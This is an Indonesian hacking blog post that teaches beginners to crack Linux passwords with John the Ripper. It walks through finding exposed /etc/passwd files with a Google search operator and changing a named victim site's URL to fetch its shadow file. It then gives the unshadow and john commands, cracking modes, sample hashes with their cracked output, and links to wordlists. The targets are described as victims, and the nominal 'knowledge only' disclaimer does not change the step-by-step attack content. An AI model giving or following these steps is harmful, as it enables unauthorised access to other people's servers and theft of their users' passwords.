Senin, 14 April 2008

John The Ripper Tutor

John The Ripper Tutor

Author : N4is3N
Contact : Profile.Friendster.com/N4is3N

"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR. AND I DONT TAKE RESPONSIBLE FOR ANYTHING.THIS IS JUST FOR KNOWLEGDE PURPOSE.THANKS."

---------------------------------------------------------------------------------------------------------------------------------

Siapa sih yg gak kenal tool yg satu ini? namanya sudah terkenal di seantero jagat Hacking... karena keHandalan dan kemudahan penggunaannya.Bagi yg belum punya, kalian bisa mendownloadnya di www.OpenWall.com/John

Okeh, to the Point aja...
Sekarang kita akan mencari target lewat bantuan
Google (google.com). Ketik keyword berikut lalu klik tombol search:

Inurl:/etc/passwd/

Maksud dari sintak di atas adalah, untuk mencari dimana letak file Password tsb berada. Untuk melakukan password cracking, kita khan harus tau dimana file password yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.

Pada OS Linux, file passwordnya berada di lokasi /etc/passwd. Sedangkan shadow passwordnya berada di /etc/shadow (baca arsip lama mengenai Shadow Password). Dengan bantuan paman google, kita berusaha mencari file password dengan cara mengetikkan keyword diatas.

Well.. gimana nich hasil pencariannya? pasti muncul banyak khan.. ;) Klik salah satu link, dan isi file /etc/passwd akan ditampilkan. oleh browser. Copy- pastekan isi file tersebut pada notepad dan simpan dengan nama password.txt.

Sekarang, kita akan melihat isi file shadow passwordnya.Misalkan url situs korban yang anda buka tadi adalah:

http://www.spyrozone.net/spyrokid/config/etc/passwd-

Ubahlah alamat itu pada address bar menjadi:

http://www.spyrozone.net/spyrokid/config/etc/shadow-

Naah, kini isi dari file etc/shadow akan ditampilkan oleh browser. Copy- paste isi file tersebut pada notepad, lalu simpan dengan nama shadow.txt.


-----------------------------

Extract file hasil downloadnya ke suatu folder lalu buka lewat MSDOS. Biar gampang,copy juga file password.txt dan shadow.txt tadi ke directory yang sama dengan John The Ripper. Setelah itu, gabungkan file password.txt dan file shadow.txt dengan menggunakan program unshadow.exe milik John The Ripper. Perintahnya ialah:

unshadow password.txt shadow.txt >> crack.txt

Setelah itu, kita gunakan john-mmx.exe untuk mengCRACK file crack.txt dengan menggunakan perintah:

john-mmx crack.txt

Tunggu dech.. lamanya hasil crack yang keluar tergantung dari seberapa panjang password korban dan seberapa rumit karakter (special characters) yang digunakan dalam password. Jika proses cracking berhasil, akan muncul:

username (password)

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Saya juga merangkum beberapa dokumentasi dari JTR.Bisa di lihat sbb:

Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session

-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --

Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)

Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.

Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]

Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt

2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.

Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]

Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt

3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara

Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt


Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.

Syntax:
john -show [passfile]>[output]

Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt

Anda juga dapat melihat langsung hasil decrypt dari JTR.

Syntax:
john -show [passfile]

Hasilnya terlihat seperti berikut:

root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left


- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C


- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.

Syntax
john w:[wordlist] -rules [passfile]


- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.

Syntax
john -restore
john -restore:[session name]
john -session:[session name]


- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.


- Semua password yang pernah di crack disimpan JTR di john.pot


Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/

2. http://www.sparkleware.com/lists.html

3. http://ftp.cerias.purdue.edu/pub/dict/local/

4. ftp://sable.ox.ac.uk/pub/wordlists/

5. http://www.theargon.com/archives/wordlists/theargonlists/

---------------------------------------------------------------------------------------------------------------------------------

Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW
- My Soulmate, Nalla Nourma N (Thx Beib for your support)


Best Regards : - Admin of HN (Imam_Samudra88, Gt_Portnoy)
- All HN older
- All HN Member

Refrensi : SpyroZone,Echo and pengalaman pribadi.

Tidak ada komentar: